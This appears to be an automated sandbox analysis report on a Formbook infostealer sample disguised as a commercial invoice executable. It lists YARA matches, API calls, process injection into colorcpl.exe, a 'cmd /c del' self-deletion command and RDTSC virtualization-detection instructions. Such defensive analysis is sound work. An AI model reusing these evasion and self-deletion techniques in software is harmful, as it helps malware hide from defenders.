          Source: 00000001.00000000.683264295.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000000.683264295.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.943426858.0000000001150000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.943426858.0000000001150000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.708365892.000000000EA3D000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.708365892.000000000EA3D000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.734132001.00000000008E0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.734132001.00000000008E0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.684515083.00000000024D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.684515083.00000000024D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000001.684056939.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000001.684056939.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000000.681309945.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000000.681309945.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.734016685.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.734016685.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\commercial invoice_010202201.exeCode function: 0_2_00403225 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\Desktop\commercial invoice_010202201.exeCode function: 0_2_0040604C
          Source: C:\Users\user\Desktop\commercial invoice_010202201.exeCode function: 0_2_00404772
          Source: C:\Users\user\Desktop\commercial invoice_010202201.exeCode function: 1_2_00401030
          Source: C:\Users\user\Desktop\commercial invoice_010202201.exeCode function: 1_2_0041C999
          Source: C:\Users\user\Desktop\commercial invoice_010202201.exeCode function: 1_2_004012FB
          Source: C:\Users\user\Desktop\commercial invoice_010202201.exeCode function: 1_2_0041BBF4
          Source: C:\Users\user\Desktop\commercial invoice_010202201.exeCode function: 1_2_0041CBF4
          Source: C:\Users\user\Desktop\commercial invoice_010202201.exeCode function: 1_2_00408C7D
          Source: C:\Users\user\Desktop\commercial invoice_010202201.exeCode function: 1_2_00408C80
          Source: C:\Users\user\Desktop\commercial invoice_010202201.exeCode function: 1_2_0041BD5A
          Source: C:\Users\user\Desktop\commercial invoice_010202201.exeCode function: 1_2_00402D90
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0493B090
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_049520A0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_049F20A8
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0493841F
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_049E1002
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04952581
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0493D5E0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0492F900
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_049F2D07
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04920D20
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04944120
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_049F1D55
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_049F22AE
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_049F2EF7
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04946E30
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0495EBB0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_049EDBD2
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_049F1FF1
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_049F2B28
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0085C999
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0085CBF4
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_00848C80
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_00848C7D
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_00842D90
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_00842FB0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 0492B150 appears 35 times
          Source: C:\Users\user\Desktop\commercial invoice_010202201.exeCode function: 1_2_004185E0 NtCreateFile,
          Source: C:\Users\user\Desktop\commercial invoice_010202201.exeCode function: 1_2_00418690 NtReadFile,
          Source: C:\Users\user\Desktop\commercial invoice_010202201.exeCode function: 1_2_00418710 NtClose,
          Source: C:\Users\user\Desktop\commercial invoice_010202201.exeCode function: 1_2_004187C0 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\commercial invoice_010202201.exeCode function: 1_2_004185DA NtCreateFile,
          Source: C:\Users\user\Desktop\commercial invoice_010202201.exeCode function: 1_2_00418632 NtCreateFile,
          Source: C:\Users\user\Desktop\commercial invoice_010202201.exeCode function: 1_2_0041868C NtReadFile,
          Source: C:\Users\user\Desktop\commercial invoice_010202201.exeCode function: 1_2_0041870B NtClose,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04969840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04969860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_049699A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_049695D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04969910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04969540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_049696D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_049696E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04969650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04969A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04969660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04969780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04969FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04969710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_049698A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_049698F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04969820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0496B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_049699D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_049695F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0496AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04969520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04969950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04969560 NtWriteFile,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04969A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04969610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04969A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04969A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04969A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04969670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0496A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_049697A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0496A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04969B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04969730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04969770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0496A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04969760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_008585E0 NtCreateFile,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_00858690 NtReadFile,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_008587C0 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_00858710 NtClose,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_008585DA NtCreateFile,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0085868C NtReadFile,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_00858632 NtCreateFile,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_008587BA NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0085870B NtClose,
          Source: commercial invoice_010202201.exe, 00000000.00000003.680455463.000000000334F000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs commercial invoice_010202201.exe
          Source: commercial invoice_010202201.exe, 00000000.00000003.683859320.00000000031B6000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs commercial invoice_010202201.exe
          Source: commercial invoice_010202201.exe, 00000001.00000003.684401687.00000000007B6000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs commercial invoice_010202201.exe
          Source: commercial invoice_010202201.exe, 00000001.00000002.734189750.0000000000963000.00000040.00020000.sdmpBinary or memory string: OriginalFilenamecolorcpl.exej% vs commercial invoice_010202201.exe
          Source: commercial invoice_010202201.exe, 00000001.00000002.734588658.0000000000C7F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs commercial invoice_010202201.exe
          Source: commercial invoice_010202201.exe, 00000001.00000002.734364645.0000000000AEF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs commercial invoice_010202201.exe
          Source: commercial invoice_010202201.exeReversingLabs: Detection: 37%
          Source: C:\Users\user\Desktop\commercial invoice_010202201.exeFile read: C:\Users\user\Desktop\commercial invoice_010202201.exeJump to behavior
          Source: commercial invoice_010202201.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\commercial invoice_010202201.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Users\user\Desktop\commercial invoice_010202201.exe "C:\Users\user\Desktop\commercial invoice_010202201.exe"
          Source: C:\Users\user\Desktop\commercial invoice_010202201.exeProcess created: C:\Users\user\Desktop\commercial invoice_010202201.exe "C:\Users\user\Desktop\commercial invoice_010202201.exe"
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\SysWOW64\colorcpl.exe
          Source: C:\Windows\SysWOW64\colorcpl.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\commercial invoice_010202201.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\commercial invoice_010202201.exeProcess created: C:\Users\user\Desktop\commercial invoice_010202201.exe "C:\Users\user\Desktop\commercial invoice_010202201.exe"
          Source: C:\Windows\SysWOW64\colorcpl.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\commercial invoice_010202201.exe"
          Source: C:\Users\user\Desktop\commercial invoice_010202201.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
          Source: C:\Users\user\Desktop\commercial invoice_010202201.exeFile created: C:\Users\user\AppData\Local\Temp\nshDF11.tmpJump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/4@14/7
          Source: C:\Users\user\Desktop\commercial invoice_010202201.exeCode function: 0_2_00402012 CoCreateInstance,MultiByteToWideChar,
          Source: C:\Users\user\Desktop\commercial invoice_010202201.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\commercial invoice_010202201.exeCode function: 0_2_00404275 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5264:120:WilError_01
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Binary string: colorcpl.pdbGCTL source: commercial invoice_010202201.exe, 00000001.00000002.734183183.0000000000960000.00000040.00020000.sdmp
          Source: Binary string: colorcpl.pdb source: commercial invoice_010202201.exe, 00000001.00000002.734183183.0000000000960000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: commercial invoice_010202201.exe, 00000000.00000003.681356710.00000000030A0000.00000004.00000001.sdmp, commercial invoice_010202201.exe, 00000000.00000003.683908574.0000000003230000.00000004.00000001.sdmp, commercial invoice_010202201.exe, 00000001.00000002.734202517.00000000009D0000.00000040.00000001.sdmp, commercial invoice_010202201.exe, 00000001.00000002.734364645.0000000000AEF000.00000040.00000001.sdmp, commercial invoice_010202201.exe, 00000001.00000003.684222462.00000000006A0000.00000004.00000001.sdmp, colorcpl.exe, 00000007.00000002.944151655.0000000004A1F000.00000040.00000001.sdmp, colorcpl.exe, 00000007.00000002.944001082.0000000004900000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: commercial invoice_010202201.exe, commercial invoice_010202201.exe, 00000001.00000002.734202517.00000000009D0000.00000040.00000001.sdmp, commercial invoice_010202201.exe, 00000001.00000002.734364645.0000000000AEF000.00000040.00000001.sdmp, commercial invoice_010202201.exe, 00000001.00000003.684222462.00000000006A0000.00000004.00000001.sdmp, colorcpl.exe, colorcpl.exe, 00000007.00000002.944151655.0000000004A1F000.00000040.00000001.sdmp, colorcpl.exe, 00000007.00000002.944001082.0000000004900000.00000040.00000001.sdmp
          Source: C:\Users\user\Desktop\commercial invoice_010202201.exeCode function: 0_2_72B21000 push eax; ret
          Source: C:\Users\user\Desktop\commercial invoice_010202201.exeCode function: 0_2_0019FD3D push ss; ret
          Source: C:\Users\user\Desktop\commercial invoice_010202201.exeCode function: 1_2_0041B822 push eax; ret
          Source: C:\Users\user\Desktop\commercial invoice_010202201.exeCode function: 1_2_0041B82B push eax; ret
          Source: C:\Users\user\Desktop\commercial invoice_010202201.exeCode function: 1_2_0041B88C push eax; ret
          Source: C:\Users\user\Desktop\commercial invoice_010202201.exeCode function: 1_2_0040609C pushfd ; ret
          Source: C:\Users\user\Desktop\commercial invoice_010202201.exeCode function: 1_2_0041C95D push es; ret
          Source: C:\Users\user\Desktop\commercial invoice_010202201.exeCode function: 1_2_0041617F pushfd ; ret
          Source: C:\Users\user\Desktop\commercial invoice_010202201.exeCode function: 1_2_00415269 push ebx; ret
          Source: C:\Users\user\Desktop\commercial invoice_010202201.exeCode function: 1_2_004172F6 push ebx; iretd
          Source: C:\Users\user\Desktop\commercial invoice_010202201.exeCode function: 1_2_0040E326 pushfd ; retf
          Source: C:\Users\user\Desktop\commercial invoice_010202201.exeCode function: 1_2_0041BD5A push dword ptr [D80D12CBh]; ret
          Source: C:\Users\user\Desktop\commercial invoice_010202201.exeCode function: 1_2_0041A5E5 push eax; retf
          Source: C:\Users\user\Desktop\commercial invoice_010202201.exeCode function: 1_2_00415758 push es; iretd
          Source: C:\Users\user\Desktop\commercial invoice_010202201.exeCode function: 1_2_0041AF62 pushfd ; iretd
          Source: C:\Users\user\Desktop\commercial invoice_010202201.exeCode function: 1_2_0041B7D5 push eax; ret
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0497D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0085B88C push eax; ret
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0084609C pushfd ; ret
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0085B822 push eax; ret
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0085B82B push eax; ret
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0085C95D push es; ret
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0085617F pushfd ; ret
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_008572F6 push ebx; iretd
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_00855269 push ebx; ret
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0084E326 pushfd ; retf
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0085C4F3 push es; ret
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0085A5E5 push eax; retf
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0085B7D5 push eax; ret
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0085C7D0 push dword ptr [D80D12CBh]; ret
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0085C739 push cs; iretd
          Source: C:\Users\user\Desktop\commercial invoice_010202201.exeCode function: 0_2_00405DA3 GetModuleHandleA,LoadLibraryA,GetProcAddress,
          Source: C:\Users\user\Desktop\commercial invoice_010202201.exeFile created: C:\Users\user\AppData\Local\Temp\nshDF13.tmp\uajs.dllJump to dropped file

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Self deletion via cmd deleteShow sources
          Source: C:\Windows\SysWOW64\colorcpl.exeProcess created: /c del "C:\Users\user\Desktop\commercial invoice_010202201.exe"
          Source: C:\Windows\SysWOW64\colorcpl.exeProcess created: /c del "C:\Users\user\Desktop\commercial invoice_010202201.exe"
          Source: C:\Users\user\Desktop\commercial invoice_010202201.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\colorcpl.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\commercial invoice_010202201.exeRDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\commercial invoice_010202201.exeRDTSC instruction interceptor: First address: 000000000040899E second address: 00000000004089A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\colorcpl.exeRDTSC instruction interceptor: First address: 0000000000848604 second address: 000000000084860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\colorcpl.exeRDTSC instruction interceptor: First address: 000000000084899E second address: 00000000008489A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\explorer.exe TID: 6632Thread sleep time: -55000s >= -30000s
          Source: C:\Windows\SysWOW64\colorcpl.exe TID: 7108Thread sleep time: -48000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\colorcpl.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\colorcpl.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\commercial invoice_010202201.exeCode function: 1_2_004088D0 rdtsc
          Source: C:\Windows\SysWOW64\colorcpl.exeAPI coverage: 9.6 %
          Source: C:\Users\user\Desktop\commercial invoice_010202201.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\commercial invoice_010202201.exeCode function: 0_2_00405D7C FindFirstFileA,FindClose,
          Source: C:\Users\user\Desktop\commercial invoice_010202201.exeCode function: 0_2_004053AA CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
          Source: C:\Users\user\Desktop\commercial invoice_010202201.exeCode function: 0_2_00402630 FindFirstFileA,
          Source: C:\Users\user\Desktop\commercial invoice_010202201.exeAPI call chain: ExitProcess graph end node
          Source: C:\Users\user\Desktop\commercial invoice_010202201.exeAPI call chain: ExitProcess graph end node
          Source: explorer.exe, 00000005.00000000.705475865.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.719567550.0000000006650000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.705475865.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.705475865.000000000A60E000.00000004.00000001.sdmpBinary or memory string: 00000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}xx
          Source: explorer.exe, 00000005.00000000.718287441.0000000004710000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
          Source: explorer.exe, 00000005.00000000.693537022.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
          Source: explorer.exe, 00000005.00000000.688480052.0000000004791000.00000004.00000001.sdmpBinary or memory string: -98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&[
          Source: explorer.exe, 00000005.00000000.718334751.0000000004791000.00000004.00000001.sdmpBinary or memory string: 700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&[
